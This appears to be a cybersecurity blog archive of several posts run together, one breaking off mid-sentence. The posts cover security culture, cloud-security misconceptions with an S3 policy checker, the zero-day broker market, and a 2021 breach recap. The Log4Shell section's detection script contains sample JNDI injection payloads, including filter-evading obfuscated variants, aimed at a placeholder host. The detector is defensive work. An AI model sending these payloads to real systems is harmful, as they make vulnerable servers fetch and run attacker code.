Rethinking Cybersecurity: Challenging the Commoditisation and Embracing Restorative Practices
Since I started in cybersecurity, I have observed that the field has become dominated by insincere vendors and practitioners driven solely by profit. As a cybersecurity leader, I have also noticed the increasing commoditisation of cybersecurity over the years, and it’s important for us to address this issue.
Going deeper into the motives, I realised the significance of my blog’s title. Initially, I chose the name to reflect the current state of cybersecurity, where my work felt repetitive and inconsequential, like an assembly line. And regardless of the organisation, the same non-technical issues kept recurring.
The primary challenge lies in the way security practitioners interact with the people they are meant to protect within these organisations. Those outside the security team are often victim-shamed and blamed for their perceived ignorance, as if they were at fault for not prioritising cybersecurity in their daily work.
Security organisations sometimes oppress the very people they are meant to serve. This behaviour struck me as counterproductive and degrading, particularly as I familiarised myself with nonviolent communication and other conflict-resolution techniques. I wondered whether adopting peacebuilding methods could foster collaboration and alignment among stakeholders. While only a few security practitioners initially showed interest, the move to DevOps and shift-left strategies, which emphasise the same attributes, attracted like-minded individuals.
Additionally, the way users are treated resembles the punitive and shaming approach commonly seen in the criminal justice system. That approach has not demonstrably reduced crime or supported victims. Restorative justice, on the other hand, which focuses on repairing the harm caused by crime and restoring the community while respecting the dignity of all involved parties, has shown promise.
Evidence suggests that traditional fear-based and shaming tactics have not effectively promoted user compliance in cybersecurity. Instead, creating a supportive workplace environment has been identified as a more effective way of encouraging voluntary security behaviours.
In the rapidly evolving landscape of cybersecurity, organisations must adapt their approaches. Rather than relying on fear, uncertainty, and doubt (FUD)-based strategies, we must acknowledge the value of users as allies and reposition cybersecurity as a collaborative effort. This involves a fundamental shift in the industry, prioritising collaboration, understanding, and support to foster a culture of proactive cybersecurity measures. By moving away from fear-based tactics and embracing a more cooperative approach, organisations will be better equipped to mitigate threats and safeguard information.
I’m certain you’ve heard many concerns from CISOs who are struggling to gain visibility into cloud environments despite their considerable efforts and resources.
Many professionals run into this issue around six to eight months into their organisation’s cloud transition. Despite significant investments of time and resources, they begin to view the move to the cloud as a costly misstep, largely because of the range of security challenges they confront.
These challenges often stem from a lack of understanding, or outright misconceptions, within the company about the nuances of cloud security.
I am consistently astonished by the widespread nature of these challenges!
Here are some of the common misunderstandings regarding security in the cloud.
“When in the cloud, it is absolutely secure.”
Since the transition to the cloud became popular, senior leaders have often claimed that “the cloud is much more secure than on-premises infrastructure.” There is some truth to this perception: they are usually presented with a slick PowerPoint deck highlighting the security benefits of the cloud and the significant investments cloud providers make to secure their environments.
It’s a common misconception that when organisations migrate to the cloud, they can hand responsibility for security to the provider, whether AWS, Google or Microsoft. This mistaken belief leads them to think that simply moving their workloads to the cloud is sufficient. That is a critical security mistake, because organisations still need to actively manage and maintain security controls in the cloud environment to protect their data and infrastructure.
The operational model of cloud computing is based on a shared responsibility framework: the cloud provider takes on a significant portion of the responsibility for maintaining the infrastructure, ensuring physical security and managing the underlying hardware and platform software. As a cloud customer, however, you remain responsible for configuring and securing your identities, applications and data within that environment.
This shared responsibility model is analogous to living in a rented property. The property owner is responsible for ensuring that the building is structurally sound and maintaining common areas, but as a tenant, you are responsible for securing your individual living space by locking doors and windows.
In the context of cloud computing, when you launch a server or deploy resources on the cloud, the cloud service provider does not automatically take over the task of securing your specific configuration and applications. Therefore, it’s essential to recognise that you must proactively implement robust security measures to protect your cloud assets.
Understanding this shared responsibility model is crucial before embarking on your cloud security program to ensure that you have a clear understanding of your role in maintaining a secure cloud environment.
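To make the customer side of the model concrete, here is an added example, written for this page rather than taken from any cloud provider’s tooling. It parses a bucket policy in the AWS IAM policy JSON format and flags Allow statements that grant access to anonymous principals, which is exactly the kind of configuration the provider will happily apply for you and never fix on your behalf. The two policy documents, the bucket name and the account ID are constructed for the example (123456789012 is the placeholder account used in AWS documentation).

```python
"""Added example (not from the page or any provider's SDK): an offline
check for the kind of customer-side configuration the shared
responsibility model leaves to you.

It parses a bucket policy in the AWS IAM policy JSON format and flags
Allow statements open to anonymous principals. The two policy documents,
the bucket name and the account ID are constructed for this example.
"""
import json

# Constructed sample: the "it's in the cloud, so it's secure" bucket.
WEAK_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicRead",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": ["arn:aws:s3:::example-customer-data",
                   "arn:aws:s3:::example-customer-data/*"]
    }
  ]
}"""

# Constructed sample: the same access scoped to one role in one (hypothetical)
# account, plus a Deny that forces TLS for everyone.
HARDENED_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AppRoleRead",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": ["arn:aws:s3:::example-customer-data",
                   "arn:aws:s3:::example-customer-data/*"]
    },
    {
      "Sid": "DenyInsecureTransport",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": ["arn:aws:s3:::example-customer-data",
                   "arn:aws:s3:::example-customer-data/*"],
      "Condition": {"Bool": {"aws:SecureTransport": "false"}}
    }
  ]
}"""


def _as_list(value):
    """IAM accepts a scalar or a list for Principal.AWS, Action and Resource."""
    return value if isinstance(value, list) else [value]


def is_anonymous_principal(principal):
    """True for the two spellings that grant to everyone, signed or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_statements(policy_json):
    """Return one finding per Allow statement open to anonymous principals.

    A Deny with Principal "*" is not a finding: that is how a rule such as
    "TLS only" is applied to everyone. An Allow that carries a Condition is
    reported for manual review rather than as public, because conditions
    differ in whether they actually restrict the caller (aws:SourceVpce does,
    aws:SecureTransport does not).
    """
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not is_anonymous_principal(stmt.get("Principal")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "actions": _as_list(stmt.get("Action", [])),
            "severity": "review" if "Condition" in stmt else "public",
        })
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, find_public_statements(doc))
```

The check is deliberately narrow: it looks only at who may call, not at what the resource ARNs cover, and it does not evaluate organisation-level guardrails such as account-wide public access blocks. In a real programme this logic belongs in the pipeline that deploys the policy, so the misconfiguration is rejected before it reaches the provider rather than discovered months later.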
The CLOUD is superior to On-Premises
Teams new to the cloud often hold biased views. Some assume that the cloud is inherently more secure than on-premises infrastructure; others believe it to be insecure and pile on excessive controls. The first mistake breeds complacency and potential breaches; the second makes the work of cloud teams unnecessarily difficult. Both typically occur when there has been no investment in training the cybersecurity team in cloud security.
Such teams struggle to harness the cloud’s potential and grapple with its unfamiliar operational dynamics, leading to mounting frustration. It’s crucial to recognise that cloud-based and on-premises infrastructures each carry their own inherent risks. What matters is not where the infrastructure is located but how effectively it is managed and safeguarded. Prioritising the upskilling of your cybersecurity team in cloud security before the migration begins ensures that your organisation is equipped to address security challenges from the outset.
We have carefully chosen a particular on-premises solution, and I am confident that it will seamlessly transition to the cloud.
It’s crucial to bear in mind that lifting on-premises solutions into the cloud and expecting identical outcomes is a serious error. Cloud environments have their own attributes and require specific configurations. Just because a solution works well on-premises does not mean it will behave the same way in the cloud.
Migrating without the necessary adaptations can expose you to risks you never had to consider before. Whenever feasible, use cloud-native services or a cloud-specific version of your on-premises tools, rather than assuming universal compatibility.
Treating the Cloud Like a Project and Not an Environment
The cloud is a different paradigm and a completely different approach to operations. It is not a one-time solution you can set up and forget. Treating it like a project you complete and then hand over is a reliable way to accumulate configuration drift and, eventually, a data breach.
When it comes to your IT infrastructure, it’s crucial to recognise that the cloud is a distinct and vital environment that requires the same level of governance as your on-premises setup. Many organisations make the mistake of treating cloud management as a secondary or tangential responsibility while focusing primarily on their on-premises systems. This approach underestimates the complexities and unique challenges of managing cloud-based resources.
It’s important to dedicate the necessary attention and resources to effectively govern and manage your cloud infrastructure in order to mitigate risks and ensure seamless operations.
It’s not my Role or Responsibility.
Assuming that the responsibilities for managing your on-premises environment will carry over seamlessly to the cloud is a risky assumption. Many organisations overlook the critical task of clearly defining who is responsible for implementing security controls, patching, monitoring and other essential tasks in the cloud. This lack of clarity can have disastrous consequences, leaving the organisation exposed to security breaches and operational inefficiencies.
It is important to establish a formally approved responsibility matrix (a RACI chart, for example) that comprehensively outlines and assigns responsibilities for cloud security within your organisation. This ensures that all stakeholders understand their roles and accountabilities in safeguarding the organisation’s cloud infrastructure.
Furthermore, if your organisation intends to outsource a significant portion of its cloud-related activities, that decision must be reflected in the same responsibility matrix. This helps align internal resources and clarifies the division of responsibilities between the organisation and its external providers.
Conclusion
In the realm of cloud security, it’s crucial to address common misconceptions to ensure a robust and effective security posture. Organisations must understand that cloud security is a shared responsibility, requiring active management and maintenance of security measures within the cloud environment. Additionally, it’s important to recognise that both cloud-based and on-premises infrastructures entail inherent risks,
In the past, I have talked about zero-day vulnerabilities and the risks they pose. This post will focus on the grey market ecosystem in which zero-day exploits are bought and sold. To set the context, let me first define some key terms that will help us assess the legality of this market.
Zero-day Vulnerability & Exploit
Zero-day vulnerabilities are flaws in software or a device that are unknown to the vendor, or known but not yet patched. Because no fix is available, anyone who knows about the flaw can exploit it, whether for financial gain or otherwise, with no patch standing in the way, which is what makes zero-days so valuable and so dangerous.
A zero-day exploit is software that takes advantage of such a vulnerability. In many jurisdictions, merely developing an exploit, or selling it, is not in itself illegal. Using it to gain unauthorised access, for financial gain or to cause harm, is.
Zero-day Brokers
Zero-day brokers operate the grey market ecosystem in which zero-day exploits are bought and sold, often by governments acting in secret. Governments do this to ensure that no one else learns of these vulnerabilities, including the software creators. Since governments are involved, you guessed it, there is a level of legitimacy to this market. Whether it is good or bad is subjective and depends on which side of the table you are on.
The History of the “Market”
Like any other market, buying and selling is the core of the business model, and zero-day brokers have existed for as long as cyber warfare has. As the Internet revolution took hold, data became, famously, the “new oil” of this century, and zero-day exploits became the most reliable way of exploiting vulnerabilities in the quest for information. Some governments and private entities buy or sell these exploits to protect national interests; in other cases, they use them to spy on adversaries. The market appears to be very small but very high value, depending on the exploit in question.
I came across a book by the New York Times cybersecurity and digital espionage journalist Nicole Perlroth; THIS IS HOW THEY TELL ME THE WORLD ENDS is an excellent account of the zero-day market. This well-researched book covers the origins and the extent of this market. She notes that it is hard to pinpoint how many researchers sell these exploits, or even how many buyers purchase them. Although the major buyers in this market are law enforcement and intelligence agencies worldwide, some private entities also buy.
The zero-day exploit market is predominantly about valuable tools used to execute covert, surgical operations. Governments have recently tried to regulate the exploit market, but no matter what controls they apply, there will always be a thriving black market for zero-day exploits.
Nicole cites in her book the inability of the United States to protect itself against espionage attempts from Russia, China and North Korea, which prompted its agencies to make zero-day exploits a critical component of their response to digital warfare. The Snowden leaks confirmed that US agencies were among the biggest players in this market. Nicole tells the story of two young hackers in the early days of this century who offered iDefense Labs, a threat intelligence company, a business model parallel to the one black-hat hackers were using to profit from vulnerabilities. White-hat hackers, with all their good intentions, were going unpaid and unacknowledged for what they found. iDefense became the first company to buy bugs from these white-hat hackers, using them to build a “threat intelligence” service for companies such as banks that ran the vulnerable business software and needed protection against attacks. The arrangement was a win-win for iDefense Labs and the white-hat hackers.
In the early days, there was no market for iDefense. To develop one, they started offering hackers money for a laundry list of bugs, but at first the bugs submitted were good for nothing. Although they considered dropping the programme, they needed to build trust. After 18 months or so, hackers from Turkey, New Zealand and Argentina submitted bugs that could exploit antivirus software, intercept passwords and steal data. As time passed, the programme gained attention, and the company started getting calls from people in government offering iDefense substantial sums of money for the bugs. The key condition in these discussions was that the software creators must not be told about the vulnerabilities. This opened up a whole new paradigm: hackers who had accepted a few hundred dollars a year earlier were now asking for six-figure payouts. It created a whole new ecosystem of buyers and sellers, known today as “zero-day brokers”.
The future of Zero-Day Brokers
As long as we have software, we will have software vulnerabilities. Therefore, this ecosystem will persist, though the way exploits are bought and sold, and what they are worth, may change. The cyber arms race is becoming enormously competitive, and governments worldwide are behaving as if there were no consequences for hacking an adversary. It is increasingly evident that countries such as the US, China, North Korea and Israel are deeply involved in cyber espionage and are finding new ways to stay ahead in the race. They will keep developing or buying exploits. Meanwhile, ordinary people will always be the last to know and the first to be impacted by a digital apocalypse. It sounds alarming, but what we are seeing in the cybersecurity world points to nothing less than a potential digital catastrophe.
In this first post of the year, I am taking out my crystal ball to predict the cybersecurity outlook for 2022 and beyond. If history is any indication of the future, we will not see much difference from 2021.
Amid the impending rise of infections from the Omicron variant of COVID19 globally and closer in Australia, I would like to wish you a happy new year 2022 through this first post of the year, trusting you all had a great start to the year.
The world has changed in the past two years because of the pandemic and a slew of sophisticated cyber-attacks. Before I take out my crystal ball, and since history is the best indicator of the future we have, let me summarise some of the cybersecurity events of the last twelve months.
Top cybersecurity events and breaches of 2021
COVID and cybersecurity threats:
Coronavirus and its variants continued disrupting our lives in 2021, and bad actors upped their game to exploit the situation. Ireland’s Health Service Executive (HSE) suffered a ransomware attack during the pandemic’s second wave, disrupting patient care because staff lost access to patient information. HSE’s recovery costs, including the replacement and upgrade of the systems crippled by the ransomware, have been estimated at more than $600 million.
JBS Foods ransomware attack and ransom:
JBS Foods, a global meat processor, experienced a ransomware attack attributed to REvil that impacted its American and Australian operations. The company later confirmed that it paid $11 million in ransom to REvil.
Log4j vulnerability (Log4Shell):
A zero-day vulnerability unlike any from the past, tracked as CVE-2021-44228. Few organisations can say with confidence that they are not affected, because the flaw sits in the Apache Log4j logging library, which is embedded in a huge range of Java applications and products. It will take some time before the long-term impact is understood.
Colonial Pipeline ransomware attack:
Colonial Pipeline, the largest fuel pipeline in the United States, suffered a data breach resulting from the DarkSide ransomware attack that hit its network in May 2021. The company shut down its operations as a result, triggering fuel shortages in the United States. During the incident, DarkSide operators also stole roughly 100 GB of files from breached Colonial Pipeline systems in about two hours.
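The reason Log4Shell was so hard to scope is that the trigger is just a string in any field the application logs, most often a request header, and attackers quickly started wrapping the tell-tale `${jndi:` in other Log4j lookups to evade naive filters. The following is an added example for this page, not code from the Log4j project or any vendor: a small detector that unwraps the common wrappings (`${lower:x}`, `${upper:x}`, the `${...:-x}` default-value trick) and URL encoding before checking, run over constructed access-log lines. The IP addresses are from the TEST-NET documentation ranges; the log lines are made up for the example.

```python
"""Added example for this page (not code from any vendor or from the
Log4j project): a detector for Log4Shell-style probes in web access logs.
The log lines below are constructed; the IP addresses come from the
TEST-NET documentation ranges.

Attackers hide the literal "${jndi:" behind other Log4j lookups, so the
detector unwraps the common ones (${lower:x}, ${upper:x}, ${anything:-x})
and URL encoding before it checks. More exotic wrappings exist; this
covers the patterns most commonly seen in the wild.
"""
import re
from urllib.parse import unquote

# ${lower:j} / ${upper:J} -> j  (no nested braces inside, so innermost first)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j} -> j  (the ":-default" trick)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
INDICATOR = "${jndi:"

# Constructed sample log (combined log format). Lines 2-5 are probes.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.10:1389/b}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/c}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:05 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.10%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:10:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


def normalise(text, max_rounds=10):
    """Unwrap lookups and URL encoding, yielding the text after every step.

    Yielding each stage lets the caller check for the indicator as soon as
    it appears, so a later substitution cannot mangle a genuine hit.
    """
    current = unquote(text).lower()
    yield current
    for _ in range(max_rounds):
        step = _CASE_LOOKUP.sub(lambda m: m.group(1), current)
        step = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), step)
        if step == current:
            return
        current = step
        yield current


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return any(INDICATOR in stage for stage in normalise(line))


def scan(lines):
    """Return (line number, fully normalised line) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        if is_log4shell_probe(line):
            hits.append((number, list(normalise(line))[-1]))
    return hits


if __name__ == "__main__":
    for number, normalised in scan(SAMPLE_LOG):
        print(f"line {number}: {normalised}")
```

A hit in the access log tells you a probe arrived, not that it succeeded; the confirming evidence is an outbound LDAP, RMI or DNS connection from the application host to the address in the payload, so pair this with egress logs. The `${date:yyyy}` line is included to show that a `${...}` lookup on its own is not the indicator.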
SolarWinds:
We saw one of the most sophisticated supply chain attacks in recent times, disclosed in December 2020, with the fallout continuing through last year. A Russian state-backed group, Cozy Bear (APT29), is credited with the attack on the popular Orion network management platform. SolarWinds released multiple Orion updates between March and June 2020 that were later identified as trojanised to install the Sunburst backdoor. The attack targeted US government assets and a wide range of private-sector industries.
Kaseya Supply Chain Attack:
In a play similar to the SolarWinds Sunburst backdoor, the Russian-speaking criminal group REvil targeted the Kaseya VSA remote management platform to launch a ransomware attack against managed service providers and, through them, reportedly more than a thousand downstream organisations globally last year.
Rise in Cybercrime:
The research organisation Cybersecurity Ventures estimates that global cybercrime damage will reach US$10.5 trillion annually by 2025, up from US$3 trillion in 2015.
Lack of Cybersecurity skills:
Cybersecurity careers have grown tremendously over the years, driven by the increase in cyber-attacks. Unfortunately, the supply of skills cannot keep pace with the challenge of defending applications, networks, infrastructure and people.
Increase in the amount of data needing protection:
We continue to see exponential growth in global data storage, which includes data stored in public and private infrastructure.
Hybrid work environment:
In these pandemic times, many people are working from home, which has opened up a new stream of cybersecurity challenges. This change looks permanent.
Predictions for 2022 & Beyond
In pandemic times, it is very difficult to predict what will happen the next day, let alone predict for the year ahead. However, let me take my crystal ball out and predict how I see cybersecurity trends for the next twelve months.
The ransomware challenge: Bad actors are getting very creative in launching ransomware attacks. With a proven business model behind them, ransomware attacks will remain rampant and challenging, with new ways of delivering malicious code.
Small and Medium Businesses (SMB): For a long time, large enterprises were the prime focus for bad actors. Those enterprises have invested heavily in detecting and responding to cyber-attacks, making successful attacks harder to pull off, so attackers have shifted their focus to SMBs. SMBs often have fewer resources and struggle to prioritise cybersecurity, leaving them exposed to sophisticated attacks. We will see an increased number of attacks against SMBs in the year ahead.
Passwordless: Every new application may mean another password to remember, which often means poor password management. We know that poorly managed passwords are the targets bad actors exploit to launch attacks. In the coming year, we will see a rapid increase in the adoption of passwordless strategies.
Supply-chain attacks: Supply-chain attacks are going to be the norm in 2022. Bad actors will further exploit already disrupted supply chains to extort ransom from enterprises, threatening to go after their customers in turn, as we saw in the SolarWinds and Kaseya attacks.
Cyber hygiene in the hybrid work environment: Enterprises will focus on improving cybersecurity awareness and skills to raise the security of their employees’ home IT environments. With a security-first approach in mind, we will see a significant improvement in overall security at home.
Threat Hunting: More and more enterprises will increase their spending to improve or create threat hunting capabilities. Just as we see creative methods used by the hackers to exploit their victims, cyber teams have to develop capabilities to identify and stop bad actors from launching a successful cyber attack.
AI-powered phishing attacks: The quality of phishing attacks has increased tremendously over the years; some are “life-like”. Bad actors are now using AI to research targets and mimic their behaviour when impersonating them in a phishing campaign. Enterprises must invest in anti-fraud education in 2022 to ensure that their employees can distinguish legitimate emails from malicious ones.
Software-defined (SD) world: The last few years have seen exponential growth in the software-defined world, with tremendous adoption of software-defined networks, infrastructure and applications. In 2022, enterprises will continue adopting SD technologies, including infrastructure as code and serverless applications, which can be purpose-built with security in mind.
Nation-state actors to target DevOps developers: Why bypass a security control if you can legitimately log in to the system? With the increased adoption of agile and DevOps methodologies, developer credentials have become the new “crown jewels” and the most sought-after target. Attackers are using a variety of techniques to obtain developers’ privileged credentials, and DevOps developers will continue to be targeted this year.
2022 will also see nation-state threat actors exploit vulnerabilities amid an ever-changing geopolitical situation and, similarly, scammers continue to exploit the COVID pandemic.